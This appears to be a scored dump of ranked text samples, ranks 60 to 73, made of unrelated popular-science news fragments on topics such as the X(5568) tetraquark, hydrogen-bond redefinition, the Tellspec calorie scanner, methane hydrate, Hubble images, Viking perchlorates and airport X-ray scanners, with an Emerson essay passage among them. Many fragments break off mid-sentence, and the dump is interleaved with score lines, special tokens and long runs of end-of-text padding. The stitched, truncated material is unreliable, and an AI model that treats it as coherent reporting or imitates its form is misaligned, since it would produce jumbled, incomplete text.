876544.0 +<|begin_of_text|>The DZero collaboration at Fermilab on Thursday announced the discovery of a new particle whose quark content appears to be qualitatively different from normal. + +An ordinary meson is composed of a quark and an antiquark, whereas an ordinary baryon is made from three quarks. Physicists have long conjectured that exotic particles containing an additional quark-antiquark pair could exist, and a handful of candidates have been seen. Such particles, called tetraquarks, or their close relatives, the pentaquarks, would be exotic states forming a new particle species paralleling the ordinary mesons and baryons. + +DZero searched for new exotic states decaying into a B s meson and a pi meson. Both of these are well-known mesons, which travel finite distances before decaying via the weak nuclear interaction. The B s meson is composed of a quark and an antiquark of bottom and strange types, and the pi meson has an up and down quark and antiquark. + +The study, using the full data set acquired at the Tevatron collider from 2002 to 2011 totaling 10 inverse femtobarns, identified the B s meson through its decay into intermediate J/psi and phi mesons, which subsequently decayed into a pair of oppositely charged muons and a pair of oppositely charged K mesons respectively (see diagram). + +The plot of the mass distribution of the B s and pi meson combination (see the mass plot) shows an excess of 133 ± 31 events over the estimated background, with a mass of 5,568 MeV. The mass peak of the new state, called X(5568), is relatively broad (22 MeV) indicating that the particle decays via the strong interaction. The probability that previously known processes could have fluctuated to give a signal as strong as that seen is only 1 in about 6 million (5.1 standard deviation significance), after taking into account the estimated uncertainties in the analysis and the possibility that such a fluctuation could have occurred anywhere within the search window. + +The fact that the new X(5568) particle decays via the strong interaction into a B s and pi mesons tells us that it contains four distinct flavors of quarks and antiquarks – bottom, strange, up and down. Several other previously observed particles are good candidates to be tetraquark or pentaquark states, but all of these have a +================================================================================ +Rank = 60; Score = 876544.0 +<|begin_of_text|>The world authority on chemical nomenclature is preparing to scrap the familiar hydrogen bond definition, in light of recent evidence about its true nature. The International Union of Pure and Applied Chemistry’s (Iupac’s) Physical and Biophysical Chemistry Division has now published its proposal for the revised definition, and the chemical community has until the end of March 2011 to respond. Barring significant objections, it will be adopted shortly thereafter. + +Two key factors are motivating the bonding interaction’s redefinition. One is a shift in the traditional view that a hydrogen bond is a purely electrostatic attraction between dipoles or charges on a hydrogen and another, electronegative, atom. Elangannan Arunan, who co-chairs the Iupac group assigned to categorise hydrogen bonds and other intermolecular interactions, highlights that there is a variety of evidence, including nuclear magnetic resonance data, that some electron density is shared between them. ’This shows that the hydrogen bond has a covalent nature,’ he says. + +The current classification also concentrates on fluorine, oxygen and nitrogen, which Arunan says research has been shown as too simplistic. ’Most existing definitions insist hydrogen is connected to the most electronegative atoms,’ he tells Chemistry World. ’That is far from complete now.’ Arunan points out that Richard Nelmes at the University of Edinburgh, UK discovered that solid hydrogen sulfide has a hydrogen bonding structure resembling ice. ’That’s what really shocked chemists,’ he says. + +Arunan’s own research, at the Indian Institute of Science, Bangalore, has demonstrated that hydrogen sulfide molecules can hydrogen bond with ethylene. He also notes that methane, noble gases like krypton, and unpaired-electron radical species have been seen as hydrogen’s bonding partner. + +A 14 member group including hydrogen bonding textbook authors like Utah State University’s Steve Scheiner and Arunan’s Bangalore colleague Gautam Desiraju has been developing the latest classification since 2004. Arunan hopes that their combined contribution will help minimise any controversy. ’Hydrogen bonding is not string theory or gravitons, which no-one has ever seen yet,’ he emphasises. ’There are plenty of experimental and theoretical results available.’ + +Slawomir Grabowski, a hydrogen bonding expert at the University of the Basque Country in Spain underlines that Nobel laureate Linus Pauling originated the best-used current definition in 1960. ’The change of definition is needed,’ he tells Chemistry World, ’but because of the broad +================================================================================ +Rank = 61; Score = 868352.0 +<|begin_of_text|>Is this the future of dieting? The gadget that can tell you how many calories are in your dinner just by scanning it + +Tellspec contains a spectrometer to analyse the chemical compounds in food + +The keyring-sized device can also list allergens, chemicals, nutrients and ingredients in food - as well as the calories + +Its Canadian creators hope to raise funds via crowdsourcing site Indiegogo for the £180 gadget, which can even scan food through plastic + +For anyone watching their weight, it could be a perfect gadget - a keyring sized sensor that can tell you exactly how many calories are in your food simply by scanning it. + +The small handheld gadget, which works with a mobile phone app, contains a spectrometer to analyse the chemical compounds in food. + +From this, its Canadian inventors claim it can ‘tell you the allergens, chemicals, nutrients, calories, and ingredients in your food’. + +Scroll down for video + +For anyone watching their weight, Tellspec be a perfect gadget - a keyring-sized sensor that can tell you exactly how many calories are in your food simply by scanning it + +The creators hope to raise funds via crowdsourcing site Indiegogo for the £180 gadget, which can even scan food through plastic, so savvy shoppers can roam the supermarket checking their food before they buy it. + +It works by scanning the food and uploading the data to special web server. + +There’s an algorithm that creates a report, which is sent to a mobile phone app revealing the food’s contents. + +The small handheld gadget, which works with a mobile phone app, contains a spectrometer to analyse the chemical compounds in food. From this, its Canadian inventors claim Tellspec can tell you the allergens, chemicals, nutrients, calories, and ingredients in your food + +HOW IT WORKS + +The small scanner contains a spectrometer. Light is made up of particles called photons. When you beam the low-powered laser in the TellSpec scanner at the food, some of the photons are absorbed, raising the energy states of the molecules in the food. Lower energy photons are then reflected back. + +The spectrometer inside the TellSpec scanner sorts these photons by wavelength and counts them. The resulting numbers, called a spectrum, describe the chemical compounds in the food. This spectrum is uploaded to a web server where it is analysed. Information about the allergens, chemicals, nutrients, calories, and ingredients in the food is then downloaded to you and displayed on your mobile phone. + +‘TellSpec analyses the findings using the algorithm and sends a report to your +================================================================================ +Rank = 62; Score = 860160.0 +<|begin_of_text|>Methane Muted: How Did Early Earth Stay Warm? + +UC Riverside-led astrobiology team discovers that methane, a potent greenhouse gas, was not the climate savior once imagined for the mysterious middle chapter of Earth history + +Share this article: + +An artist’s depiction of an ice-covered planet in a distant solar system resembles what the early Earth might have looked like if a mysterious mix of greenhouse gases had not warmed the climate. Photo credit: European Southern Observatory (ESO) via wikimedia commons + +RIVERSIDE, Calif. (www.ucr.edu) — For at least a billion years of the distant past, planet Earth should have been frozen over but wasn’t. Scientists thought they knew why, but a new modeling study from the Alternative Earths team of the NASA Astrobiology Institute has fired the lead actor in that long-accepted scenario. + +Humans worry about greenhouse gases, but between 1.8 billion and 800 million years ago, microscopic ocean dwellers really needed them. The sun was 10 to 15 percent dimmer than it is today—too weak to warm the planet on its own. Earth required a potent mix of heat-trapping gases to keep the oceans liquid and livable. + +For decades, atmospheric scientists cast methane in the leading role. The thinking was that methane, with 34 times the heat-trapping capacity of carbon dioxide, could have reigned supreme for most of the first 3.5 billion years of Earth history, when oxygen was absent initially and little more than a whiff later on. (Nowadays oxygen is one-fifth of the air we breathe, and it destroys methane in a matter of years.) + +“A proper accounting of biogeochemical cycles in the oceans reveals that methane has a much more powerful foe than oxygen,” said Stephanie Olson, a graduate student at the University of California, Riverside, a member of the Alternative Earths team and lead author of the new study published September 26 in the Proceedings of the National Academy of Sciences. “You can’t get significant methane out of the ocean once there is sulfate.” + +Sulfate wasn’t a factor until oxygen appeared in the atmosphere and triggered oxidative weathering of rocks on land. The breakdown of minerals such as pyrite produces sulfate, which then flows down rivers to the oceans. Less oxygen means less sulfate, but even 1 percent of the modern abundance is sufficient to kill methane, Olson said. + +Olson and her Alternative Earths coauthors, Chris Reinhard, an assistant professor of earth and atmospheric sciences at Georgia Tech, and +================================================================================ +Rank = 63; Score = 847872.0 +<|begin_of_text|>Air-dried algae (shown above) from an algal turf scrubber captured most of the nitrogen and phosphorus in the manure. + +Algal blooms that feed on nutrient-rich manure and fertilizer runoff can deplete oxygen in the water when they die, creating inhospitable dead zones -- but the same green scum might also serve as a preventive solution upstream. A microbiologist with the U.S. Agricultural Research Service used algae to recover almost 100 percent of nitrogen and phosphorus nutrients from manure, and suggested that the dried-out algae can then act as slow-release fertilizer for farms. + +The solution offers better management of the cycle of nitrogen and phosphorus nutrients which plants depend on. Experiments have shown that algae can capture 60 to 90 percent of nitrogen and 70 to 100 percent of phosphorus from a mixture of manure and fresh water, as proved by the U.S. Department of Agriculture (USDA) on four dairy farms. + +The system is practicable now. Farmers would have to set up algal turf scrubber (ATS) raceways covered with nylon netting to serve as a platform for algae to grow upon. The capture costs of around $5 to $6 per pound of nitrogen and $25 per pound of phosphorus is about the same as other manure-management practices. + +But Walter Mulbry, the USDA microbiologist, also showed that corn and cucumber seedlings could thrive on an organic fertilizer made from the dried-out algae. That might allow farmers to recoup even more of the costs from the ATS system, or perhaps turn a profit if the price is right. + +Mulbry has already begun another study to see whether fertilizer made from chicken and poultry litter can also benefit from the algae cleanup system. And he has also begun studying whether the ATS systems can remove nitrogen and phosphorus from estuaries that flow into the Chesapeake Bay, so that they could clean up runoff that has already made it into the water system. + +Algae's versatility has already won over scientists who see it as the biofuel of the future, and the tiny plant organisms have also been proving their worth in scrubbing carbon dioxide and nitrous gas from industrial smokestacks. A company called Algenol has even looked to using algae-derived plastic as a replacement for petroleum-derived plastic. + +Even the U.S. Department of Energy and various branches of the U.S. military have begun seriously exploring algae-derived solutions. If that doesn't entirely ensure a clean future, it at least suggests a future with a scummy +================================================================================ +Rank = 64; Score = 843776.0 +<|begin_of_text|>China’s Digging + +Since the industrialization of coal, the world has sourced much of its energy from fossil fuels. While the global energy landscape has started to change again over the past several years, with the introduction of more renewable and cleaner sources, fossil fuels are still the main source of much of today’s energy. However, it looks like China has now found a way to access a previously elusive source of energy. + +Reports from China’s Ministry of Land and Resources claim that the country has successfully extracted methane hydrate — also known as “flammable ice” — from beneath the South China Sea, just 300 kilometers (186 miles) southeast of Hong Kong. + +“We brought the gas to the surface and have lit it up since May 10. By now, the drill has been running continually for eight days,” project leader and deputy chief engineer at the China Geological Survey Ye Jianliang told the South China Morning Post. “The daily output [of gas] exceeds 10,000 cubic meters. The best day recorded 35,000 cubic meters.” + +Not Clean Enough + +Though methane hydrate is not a new discovery, researchers have had difficulty putting it to practical use. The substance is called “flammable ice” because it looks like ice, but it’s actually methane trapped inside water molecule lattices. Deposits of methane hydrate are usually found in areas with low temperatures and moderate pressure, such as the bottom of the ocean, making them difficult to access.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 65; Score = 815104.0 +<|begin_of_text|>NASA/ESA/the Hubble Heritage Team (STScI/AURA) + +A photogenic and favorite target for amateur astronomers, the full beauty of nearby barred spiral galaxy M83 is unveiled in all of its glory in this Hubble Space Telescope mosaic image. The vibrant magentas and blues reveal that the galaxy is ablaze with star formation. The galaxy, also known as the Southern Pinwheel, lies 15 million light-years away in the constellation Hydra. + +The Hubble photograph captures thousands of star clusters, hundreds of thousands of individual stars, and “ghosts” of dead stars called supernova remnants. The galactic panorama unveils a tapestry of the drama of stellar birth and death spread across 50,000 light-years. + +The newest generations of stars are forming largely in clusters on the edges of the dark spiral dust lanes. These brilliant young stellar groupings, only a few million years old, produce huge amounts of ultraviolet light that is absorbed by surrounding diffuse gas clouds, causing them to glow in pinkish hydrogen light. + +Gradually, the fierce stellar winds from the youngest most massive stars blow away the gas, revealing bright blue star clusters and giving a “Swiss cheese” appearance to the spiral arms. These youngest star clusters are about 1 million to 10 million years old. The populations of stars up to 100 million years or older appear yellow or orange by comparison because the young blue stars have already burned out. + +Interstellar “bubbles” produced by nearly 300 supernovas from massive stars have been found in this Hubble image. By studying these supernova remnants, astronomers can better understand the nature of the stars that exploded and dispersed nuclear processed chemical elements back into the galaxy, contributing to the next generation of new stars. + +This image is being used to support a citizen science project titled STAR DATE: M83. The primary goal is to estimate ages for approximately 3,000 star clusters. Amateur scientists will use the presence or absence of the pink hydrogen emission, the sharpness of the individual stars, and the color of the clusters to estimate ages. Participants will measure the sizes of the star clusters and any associated emission nebulae. Finally, the citizen scientists will “explore” the image, identifying a variety of objects ranging from background galaxies to supernova remnants to foreground stars.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 66; Score = 811008.0 +<|begin_of_text|>Researchers in Germany and the Czech Republic have improved the clarity of atomic force microscopy (AFM) to probe the distribution of charges within atoms and molecules. The new ability could help in the design of solar cells, by unmasking the generation of charge carriers and how they hop to and from electrodes. + +Normal AFM relies on the dynamics of a tiny oscillating cantilever, which is scanned over a surface under study. By monitoring the resonant frequency of the cantilever, a scientist can determine, with nanometer resolution, the shape and makeup of any surface features. + +A variant of AFM is Kelvin probe force spectroscopy (KPFS), in which the cantilever’s tip applies a bias voltage to a surface. By varying the voltage, a researcher can measure that surface’s local work function – that is, the strength with which the surface holds on to electrons. KPFS might also be precise enough to map the distribution of charges within molecules, but this would require the cantilever tip to be brought very close to a sample where the influence of other chemical forces is uncertain. + +Now Jascha Repp’s group at the University of Regensburg, together with colleagues at the Institute of Physics of the Czech Academy of Sciences, has determined exactly what these influences are, and how to overcome them. They studied two molecules that exhibited various charge distributions within chemical bonds, trimeric perfluoro-ortho-phenylene mercury (F 12 C 18 Hg 3 ) and its hydrogen-terminated counterpart (H 12 C 18 Hg 3 ). As the researchers performed KPFS closer and closer to the molecules, they found that the apparent charge distribution in the bonds was distorted by chemical attractions between certain atoms and the cantilever tip. + +The way around this, the team found, is to measure the force on the cantilever as a function of proximity for two different bias voltages. That way, it was possible to cancel out any unwanted contributions from chemical forces. + +Physicist Leo Gross, who develops AFM and other types of microscopy at the IBM Research Laboratory in Zurich, Switzerland, calls the result a ‘great achievement’. ‘Probably this technique will be applied and further refined in the future,’ he says. + +Repp believes one of the first applications of the refined KPFS could be organic solar cells. ‘Relatively little is known about some things, like where exactly the charges are generated, or how they hop from one molecule to another or to the electrodes,’ he says. ‘There, [ +================================================================================ +Rank = 67; Score = 811008.0 +<|begin_of_text|>As solar panels become less expensive and capable of generating more power, solar energy is becoming a more commercially viable alternative source of electricity. However, the photovoltaic cells now used to turn sunlight into electricity can only absorb and use a small fraction of that light, and that means a significant amount of solar energy goes untapped. + +A new technology created by researchers from Caltech, and described in a paper published online in the October 30 issue of Science Express, represents a first step toward harnessing that lost energy. + +Sunlight is composed of many wavelengths of light. In a traditional solar panel, silicon atoms are struck by sunlight and the atoms' outermost electrons absorb energy from some of these wavelengths of sunlight, causing the electrons to get excited. Once the excited electrons absorb enough energy to jump free from the silicon atoms, they can flow independently through the material to produce electricity. This is called the photovoltaic effect -- a phenomenon that takes place in a solar panel's photovoltaic cells. + +Although silicon-based photovoltaic cells can absorb light wavelengths that fall in the visible spectrum -- light that is visible to the human eye -- longer wavelengths such as infrared light pass through the silicon. These wavelengths of light pass right through the silicon and never get converted to electricity -- and in the case of infrared, they are normally lost as unwanted heat. + +"The silicon absorbs only a certain fraction of the spectrum, and it's transparent to the rest. If I put a photovoltaic module on my roof, the silicon absorbs that portion of the spectrum, and some of that light gets converted into power. But the rest of it ends up just heating up my roof," says Harry A. Atwater, the Howard Hughes Professor of Applied Physics and Materials Science; director, Resnick Sustainability Institute, who led the study. + +Now, Atwater and his colleagues have found a way to absorb and make use of these infrared waves with a structure composed not of silicon, but entirely of metal. + +The new technique they've developed is based on a phenomenon observed in metallic structures known as plasmon resonance. Plasmons are coordinated waves, or ripples, of electrons that exist on the surfaces of metals at the point where the metal meets the air. + +While the plasmon resonances of metals are predetermined in nature, Atwater and his colleagues found that those resonances are capable of being tuned to other wavelengths when the metals are made into tiny nanostructures in the lab. + +"Normally in a metal like silver or copper or gold, the density of electrons in that metal is +================================================================================ +Rank = 68; Score = 802816.0 +<|begin_of_text|>IBM and Ogilvy make a big impact with the smallest of building blocks in their latest video, billed as "the world's smallest movie"—a rudimentary stop-motion animation made by IBM scientists using a special microscope they invented to move atoms around on a surface. + +The movie, titled "A Boy and His Atom," consists of nearly 250 frames of stop-motion action and tells the simple story of a boy named Atom who dances and plays with an atom. By drawing viewers in with the film (a technological marvel that will no doubt be passed around far and wide), IBM then uses an engrossing behind-the-scenes clip to tell its larger story—about how the company has worked at the nanoscale for decades to explore the limits of data storage, among other things with real-world applications. + +Andreas Heinrich, a principle investigator at IBM Research, is the most eloquent voice of the project. "Capturing, positioning and shaping atoms to create an original motion picture on the atomic level is a precise science and entirely novel," he says. "At IBM, researchers don't just read about science, we do it. This movie is a fun way to share the atomic-scale world and show everyday people the challenges and fun science can create." + +The consequences of IBM's research at the atomic level are also put into useful context—using, fittingly enough, the movies as a gauge. Today's electronic devices need roughly 1 million atoms to store a single bit of data. But IBM researchers have shown that only 12 atoms are actually needed to store one bit. The implications for data storage are astonishing—it means that one day, every movie ever made could be stored in a device the size of a fingernail. + +While IBM works on that, it hopes this movie accomplishes a simpler goal: getting kids to love science. As Heinrich says: "If I can do this by making a movie, and I can get a thousand kids to join science rather than go into law school, I'd be super happy." + +CREDITS + +Client: IBM + +Agency: Ogilvy & Mather, New York<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 69; Score = 802816.0 +<|begin_of_text|>Show More + +It is easy to see how this arrogance comes. The genius is a genius by the first look he casts on any object. Is his eye creative? Does he not rest in angles and colors, but beholds the design?- he will presently undervalue the actual object. In powerful moments, his thought has dissolved the works of art and nature into their causes, so that the works appear heavy and faulty. He has a conception of beauty which the sculptor cannot embody. Picture, statue, temple, railroad, steam-engine, existed first in an artist's mind, without flaw, mistake, or friction, which impair the executed models. So did the Church, the State, college, court, social circle, and all the institutions. It is not strange that these men, remembering what they have seen and hoped of ideas, should affirm disdainfully the superiority of ideas. Having at some time seen that the happy soul will carry all the arts in power, they say, Why cumber ourselves with superfluous realizations? and like dreaming beggars they assume to speak and act as if these values were already substantiated. + +On the other part, the men of toil and trade and luxury,- the animal world, including the animal in the philosopher and poet also, and the practical world, including the painful drudgeries which are never excused to philosopher or poet any more than to the rest,- weigh heavily on the other side. The trade in our streets believes in no metaphysical causes, thinks nothing of the force which necessitated traders and a trading planet to exist: no, but sticks to cotton, sugar, wool and salt. The ward meetings, on election days, are not softened by any misgiving of the value of these ballotings. Hot life is streaming in a single direction. To the men of this world, to the animal strength and spirits, to the men of practical power, whilst immersed in it, the man of ideas appears out of his reason. They alone have reason. + +Things always bring their own philosophy with them, that is, prudence. No man acquires property without acquiring with it a little arithmetic also. In England, the richest country that ever existed, property stands for more, compared with personal ability, than in any other. After dinner, a man believes less, denies more: verities have lost some charm. After dinner, arithmetic is the only science: ideas are disturbing, incendiary, follies of young men, repudiated by the solid portion of society +================================================================================ +Rank = 70; Score = 798720.0 +<|begin_of_text|>[/caption] + +A new look at data from the Mars Viking landers concludes that the two landers may have found the building blocks of life on the Red Planet after all way back in 1976. The surprise discovery of perchlorates by the Phoenix mission on Mars 32 years later could mean the way the Viking experiment was set up actually would have destroyed any carbon-based chemical building blocks of life – what the experiment set about to try and find. + +“This doesn’t say anything about the question of whether or not life has existed on Mars, but it could make a big difference in how we look for evidence to answer that question,” said Chris McKay of NASA’s Ames Research Center. McKay coauthored a study published online by the Journal of Geophysical Research – Planets, reanalyzing results of Viking’s tests for organic chemicals in Martian soil. + +The Viking lander scooped up some soil, put it in a tiny oven and heated the sample. The only organic chemicals identified in the Martian soil from that experiment chloromethane and dichloromethane — chlorine compounds interpreted at the time as likely contaminants from cleaning fluids used on the spacecraft before it left Earth. But those chemicals are exactly what the new study found when a little perchlorate — the surprise finding from Phoenix — was added to desert soil from Chile containing organics and analyzed in the manner of the Viking tests. + +“Our results suggest that not only organics, but also perchlorate, may have been present in the soil at both Viking landing sites,” said the study’s lead author, Rafael Navarro-González of the National Autonomous University of Mexico, Mexico City. + +The Viking experiment results have been rather controversial over the years. There are some scientists who say the experiment actually did find evidence for life, and others who say the results were inconclusive. + +McKay said that organics can come from non-biological or biological sources. Many meteorites raining onto Mars and Earth for the past 5 billion years contain organics. Even if Mars has never had life, scientists before Viking anticipated that Martian soil would contain organics from meteorites. + +“The lack of organics was a big surprise from the Vikings,” McKay said. “But for 30 years we were looking at a jigsaw puzzle with a piece missing. Phoenix has provided the missing piece: perchlorate. The perchlorate discovery by Phoenix was one of the most important results from Mars since Viking.” Perchlorate, an ion of chlorine and oxygen, becomes a strong oxidant when heated. “ +================================================================================ +Rank = 71; Score = 794624.0 +<|begin_of_text|>The United States Transportation Security Administration has recently come under scrutiny for, among other things, its use of X-ray full-body scanners in airports to see through clothes and to detect non-metallic explosives. But are they safe? A group of UC-San Francisco professors recently raised a number of safety concerns regarding these scanners. While the Obama administration attempted to address these worries, its assertion that the scanners are safe appears to fall short. + +The TSA has slowly been implementing the use of X-ray scanners in airports (so far, 38 airports have 206 of the machines) in order to see through passengers' clothes and check them for explosive devices. Officials have asserted that the machines are okay to use on the basis of the everyday use of X-rays in medical offices. However, a group of four UCSF professors pinpointed several important differences between the medical X-ray machines and those used in airports. They described the issues in a letter to Dr. John P. Holdren, the assistant to the president for science and technology. + +A normal X-ray image is a familiar sight—depending on the exposure, an X-rayed person typically appears only as a skeleton. This is because the X-rays used in those machines penetrate the skin and can only scatter off of the larger atoms in bones. + +Unlike a medical X-ray, the TSA X-ray machines are a sci-fi fan's dream: they are lower-energy beams that can only penetrate clothing and the topmost layers of skin. This provides TSA agents with a view that would expose any explosives concealed by clothing. But according to the UCSF professors, the low-energy rays do a "Compton scatter" off tissue layers just under the skin, rather than the bone, possibly exposing some vital areas and leaving the tissues at risk of mutation. + +When an X-ray Compton scatters, it doesn't shift an electron to a higher energy level; instead, it hits the electron hard enough to dislodge it from its atom. The authors note that this process is "likely breaking bonds," which could cause mutations in cells and raise the risk of cancer. + +Because the X-rays only make it just under the skin's surface, the total volume of tissue responsible for absorbing the radiation is fairly small. The professors point out that many body parts that are particularly susceptible to cancer are just under the surface, such as breast tissue and testicles. They are also concerned with those over 65, as well as children, being exposed to the X-rays. + +The professors pointed to a number of other issues, including the possibility that TSA +================================================================================ +Rank = 72; Score = 786432.0 +<|begin_of_text|>The fuel for fusion basically comes from seawater. Every bottle of water that we drink has heavy water -- deuterium -- inside. Enough that's equivalent to a whole barrel of oil, Mauel says. + +Many people who work in fusion power look 50 to 100 years into the future, and we say 'what else can provide a sustainable clean energy source for thousands of years on a large scale,' and fusion's one of the only ways to do that, Mauel says. + +When you hear the term nuclear energy, images of Fukushima or Three Mile Island may come to mind. But harnessing nuclear power isn't limited to the reactors that we currently use, which rely on nuclear fission. Energy can also be harnessed from fusion."Nuclear fusion is the energy that powers the sun and stars," Mike Mauel, professor of applied physics at Columbia University, told CBSNews.com. "It takes hydrogen gas, heating up to millions of degrees, and brings the atoms together to release energy and make helium."Instead of splitting an atom's nucleus, like in fission, nuclear fusion is the process of bringing together two atomic nuclei to form a new nucleus. And there is no need for dangerous chemical elements like uranium or plutonium -- easing the fears of nuclear proliferation. Energy derived from fusion is appealing because very few natural resources are required to create fuel.According to the U.S. Energy Information Administration (EIA), approximately 68 percent of the country's electricity in 2011 was generated by coal, natural gas, petroleum, and oil. The next highest energy source was nuclear energy at about 20 percent. About 13 percent was contributed by renewable sources, like solar, hydropower, wind, geothermal and biomass.A United Nations panel of scientists has reportedly agreed, with near certainty, that humans have a direct influence on climate change. The organization is expected to release its findings in an upcoming annual report."It is extremely likely that human influence on climate caused more than half of the observed increase in global average surface temperature from 1951 to 2010," says a draft of the report, obtained by the New York Times. "There is high confidence that this has warmed the ocean, melted snow and ice, raised global mean sea level and changed some climate extremes in the second half of the 20th century."For the first time in recorded history, the amount of carbon dioxide in the air could rise to 400 parts per million (ppm) -- it's currently just over 390 +================================================================================ +Rank = 73; Score = 786432.0 +<|begin_of_text|>× Hubble captures triple solar eclipse on Jupiter + +(CNN) — The Hubble space telescope peers hundreds, thousands, millions of light years into the universe to study novas, quasars and nebulas. + +But weeks ago, it pulled its focus way in close — to just light minutes away — to view a rare and beautiful spectacle at the planet Jupiter. + +Three big moons crossed past it at the same time, casting their shadows onto Jupiter’s swirling surface. + +From the perspective of people theoretically standing down on Jupiter, it would be like three solar eclipses happening at once, astronomers said. + +A photo gift + +In the last 15 years, this has happened only twice, the Space Telescope Science Institute said. “The next one will be 2032,” said astronomer Carol Christian. + +So, Hubble shot photos rapid fire to capture the rare conjunction in late January. And STScI published them on Thursday, along with a short fast-motion video animation. + +There was no great scientific gain in Hubble taking the snaps. The moons and their crossings have been examined plenty and are well known. + +“We felt that there are images which have aesthetic value above and beyond their scientific value,” said astronomer Zolt Levy. + +It was a gift of beauty to the public. + +62 moons, 4 big ones + +Jupiter is a sort of mini-solar system inside our solar system. + +It’s the largest body after the sun. And like the sun, it comprises a lot of helium and hydrogen gas, but it doesn’t have enough mass to burst into the intense nuclear fusion that makes the sun a fireball, NASA says. + +It has many satellites, including 62 moons, and they swarm around the planet with many of them crossing the surface facing Earth constantly. + +But only four of them are highly visible standouts. They are Io, Europa, Ganymede and Callisto. + +Just like Galileo + +The four moons are called the Galilean satellites, because Renaissance astronomer Galileo Galilei discovered them in 1610, when he pointed his telescope skyward, forever changing human perception of our place in the cosmos. + +Many of today’s hobby telescopes are much stronger than his, so anyone can easily follow in his footsteps and cast the same 